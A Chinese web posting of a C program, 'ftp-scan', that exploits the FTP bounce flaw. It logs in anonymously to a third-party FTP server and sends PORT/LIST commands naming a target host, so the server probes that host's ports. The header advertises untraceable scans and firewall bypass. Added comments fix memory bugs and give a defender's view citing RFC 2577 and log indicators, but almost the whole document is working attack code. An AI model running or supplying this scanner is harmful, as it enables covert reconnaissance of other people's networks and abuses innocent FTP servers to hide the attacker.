
扫描FTP服务器漏洞



        

    /** FTP Scan

    ** Exploits bug in FTP protocol that allows user to connect to arbitrary

    * IP address and port.

    ** Features: Untraceable port scans. Bypass firewalls!

    * Example usage:

    * ftp-scan ftp.cdrom.com 127.0.0.1 0 1024

    ** This will scan IP 127.0.0.1 from ftp.cdrom.com from port 0 to 1024

    */

    #include <stdarg.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <strings.h>
    #include <unistd.h>

    #include <sys/param.h>
    #include <sys/types.h>
    #include <sys/socket.h>

    #include <netinet/in.h>

    #include <netdb.h>

    /* Descriptor of the FTP control connection; assigned in rconnect() and
     * used by every other function in this file. */
    int sock;

    /* Most recent reply line from the server. readln() fills it and main()
     * searches it with strstr(); capacity is fixed at 1024 bytes. */
    char line[1024];

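    /*
     * Resolve `server` and open a TCP connection to its port 21, storing the
     * descriptor in the global `sock`.
     *
     * Every failure (unknown host, non-IPv4 answer, socket() or connect()
     * error) prints a message and terminates the process with a failure
     * status. The listing on the page ignored the socket()/connect() results
     * and exited with status 0 on an unknown host, so later send()/read()
     * calls could run on an invalid descriptor.
     *
     * The "\n" in the message is restored; the page shows a bare 'n' where the
     * escape was lost.
     */
    void rconnect(char *server)
    {
        struct sockaddr_in sin;
        struct hostent *hp;

        hp = gethostbyname(server);
        if (hp == NULL) {
            printf("Unknown host: %s\n", server);
            exit(EXIT_FAILURE);
        }

        /* sin_addr is an IPv4 field: refuse any answer of another family or
         * size instead of copying h_length bytes into it unchecked. */
        if (hp->h_addrtype != AF_INET ||
            hp->h_length != (int)sizeof(sin.sin_addr)) {
            fprintf(stderr, "Unsupported address type for host: %s\n", server);
            exit(EXIT_FAILURE);
        }

        memset(&sin, 0, sizeof(sin));
        memcpy(&sin.sin_addr, hp->h_addr_list[0], sizeof(sin.sin_addr));
        sin.sin_family = AF_INET;
        sin.sin_port = htons(21);

        sock = socket(AF_INET, SOCK_STREAM, 0);
        if (sock < 0) {
            perror("socket");
            exit(EXIT_FAILURE);
        }

        if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
            perror("connect");
            close(sock);
            exit(EXIT_FAILURE);
        }
    }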

     

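    /*
     * Send the anonymous-login pair (USER ftp / PASS user@) on the control
     * connection `sock`.
     *
     * No reply is read here; the caller inspects the server's answers itself.
     * As in the original, the two commands are separated by a one-second
     * pause rather than by waiting for the reply to USER.
     *
     * Changes from the listing on the page:
     *  - the line terminators are restored to "\n" (the page shows a bare 'n'
     *    where the escape was lost);
     *  - the constant commands are sent directly instead of being formatted
     *    into a scratch buffer with sprintf();
     *  - send() failures are reported instead of being ignored.
     */
    void login(void)
    {
        static const char user_cmd[] = "USER ftp\n";
        static const char pass_cmd[] = "PASS user@\n";

        if (send(sock, user_cmd, sizeof(user_cmd) - 1, 0) < 0) {
            perror("send USER");
            return;
        }

        sleep(1);

        if (send(sock, pass_cmd, sizeof(pass_cmd) - 1, 0) < 0) {
            perror("send PASS");
        }
    }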

     

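    /*
     * Read one line from `sock` into the global `line`, one byte at a time.
     *
     * The stored text keeps its trailing '\n' when one was received and is
     * always NUL-terminated. NUL bytes sent by the peer are dropped so the
     * result stays a valid C string for the strstr() checks in main().
     *
     * Defects fixed relative to the listing on the page:
     *  - writes are bounded by sizeof(line); the original kept storing bytes
     *    until a terminator arrived, so a peer that sent a long line could
     *    write past the 1024-byte buffer;
     *  - the result of read() is checked; on end-of-file or error the loop
     *    stops instead of re-processing a stale byte forever;
     *  - read() is called with its three real arguments;
     *  - the comparison operand, missing on the page, is taken to be '\n'
     *    (the terminator a line reader stops on).
     *
     * A line longer than the buffer is returned in pieces across successive
     * calls. On end-of-file `line` is left empty; the void interface gives the
     * caller no other signal, so callers that loop until a marker appears need
     * their own bound.
     */
    void readln(void)
    {
        size_t used = 0;
        char ch;

        line[0] = '\0';

        /* Leave one slot for the terminating NUL. */
        while (used < sizeof(line) - 1) {
            ssize_t got = read(sock, &ch, 1);

            if (got <= 0) {
                break;          /* peer closed the connection, or read failed */
            }
            if (ch == '\0') {
                continue;       /* never embed a NUL in the reply text */
            }

            line[used++] = ch;
            if (ch == '\n') {
                break;
            }
        }

        line[used] = '\0';
    }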

     

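    /*
     * Send the NUL-terminated string `s` on the control connection `sock`.
     *
     * The array size in the parameter is decorative: `s` is an ordinary
     * pointer and its length is taken with strlen().
     *
     * send() may accept fewer bytes than requested, and the original ignored
     * its result. This version keeps sending until the whole string is out
     * and reports a failure instead of dropping it silently.
     */
    void sendln(char s[1024])
    {
        const char *cur = s;
        size_t left = strlen(s);

        while (left > 0) {
            ssize_t sent = send(sock, cur, left, 0);

            if (sent <= 0) {
                perror("send");
                return;
            }
            cur += sent;
            left -= (size_t)sent;
        }
    }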

     

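    /*
     * Low eight bits of `b` as a non-negative int. Used to print the bytes of
     * an address or port without sign extension when plain char is signed.
     * The argument is parenthesised so the cast applies to the whole
     * expression passed in, not just to its first operand.
     */
    #define UC(b) (((int)(b)) & 0xff)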

     

    /*
     * Entry point. Usage: ftp-scan ftp_server scan_host loport hiport
     *
     * Flow, as written:
     *   1. resolve scan_host (argv[2]) and keep its address bytes in `sin`;
     *   2. connect to ftp_server (argv[1]) via rconnect() and log in via login();
     *   3. read up to 200 reply lines looking for "230 Guest";
     *   4. for each port i in [loport, hiport): send PORT naming scan_host's
     *      address and port i, then LIST, and wait for a reply line containing
     *      "150" or "425"; print "<i> connected." when it contains "150".
     *
     * Defender's view: the PORT argument names scan_host rather than this
     * client, so each LIST makes the FTP server attempt a data connection to a
     * third party. A server that refuses PORT when the address differs from
     * the control connection's peer (RFC 2577 recommends this, along with
     * refusing ports below 1024) does not exhibit the behaviour this program
     * depends on. In the server's logs the activity is one anonymous session
     * issuing many PORT commands with a non-client address and stepping port
     * numbers, each followed by LIST.
     *
     * NOTE(review): `void main` is non-standard; no exit status is returned on
     * the normal path.
     * NOTE(review): the bare 'n' characters inside the string literals below
     * look like "\n" escapes lost when the page was extracted. They are left
     * as shown here.
     */
    void main(int argc, char **argv)

    {

    char buf[1024];

    int i;

    u_short sport,eport;

    register char *p,*a;

    struct hostent *hp;

    /* Scratch holder for scan_host's address and the port under test; only
     * its sin_addr and sin_port bytes are read back, it is never passed to
     * connect(). */
    struct sockaddr_in sin;

    char adr[1024];

     

    if (argc != 5) {

    printf("usage: ftp-scan ftp_server scan_host loport hiportn");

    exit(-1);

    }

    hp = gethostbyname(argv[2]);

    if (hp==NULL) {

    printf("Unknown host: %sn",argv[2]);

    /* NOTE(review): exits with status 0 although this is an error path. */
    exit(0);

    }

    bzero((char*) &sin, sizeof(sin));

    /* NOTE(review): copies h_length bytes without checking that it matches
     * sizeof(sin.sin_addr). */
    bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);

    rconnect(argv[1]);

    /* Anonymous login on the control connection. */

    login();

    /* Read at most 200 reply lines; stop early on one containing "230 Guest".
     * NOTE(review): if no such line arrives the loop simply ends and the code
     * below runs anyway, so a failed login is not detected. The match also
     * depends on the server's exact wording of its 230 reply. */

    for (i=0; i<200; i++) {

    readln();

    if (strstr(line,"230 Guest")) {

    printf("%s",line);

    /* Forces the loop condition false; acts as a break. */
    i = 200;

    }

    }

    a=(char *)&sin.sin_addr;

    /* NOTE(review): atoi() reports no errors and the results are stored in
     * u_short, so non-numeric or out-of-range arguments are silently
     * converted or truncated. */
    sport = atoi(argv[3]);

    eport = atoi(argv[4]);

    /* scan_host's address as four comma-separated decimal bytes, the form the
     * PORT command takes. Assumes a 4-byte address; confirm against the
     * h_length note above. */
    sprintf(adr,"%i,%i,%i,%i",UC(a[0]),UC(a[1]),UC(a[2]),UC(a[3]));

    /* hiport itself is excluded: the loop runs while i < eport. */
    for (i=sport; i<eport; i++) {

    /* htons() puts the port in network byte order so p[0], p[1] are the
     * high and low bytes written into the PORT argument. */
    sin.sin_port = htons(i);

    p=(char *)&sin.sin_port;

    sprintf(buf,"nPORT %s,%i,%inLISTn",adr,UC(p[0]),UC(p[1]));

    sendln(buf);

    sprintf(line,"");

    /* Wait for a line containing "150" or "425". In RFC 959 these are the
     * reply codes for "about to open data connection" and "can't open data
     * connection".
     * NOTE(review): strstr() matches the digits anywhere in the line, not
     * only as the leading reply code, and the loop has no exit if the
     * server closes the connection or answers with any other code. */
    while (!strstr(line, "150") && !strstr(line,"425")) {

    readln();

    }

    if (strstr(line,"150")) {

    printf("%i connected.n",i);

    }

    }

    close(sock);

    }


    发布人:netbull 来自:奥索网络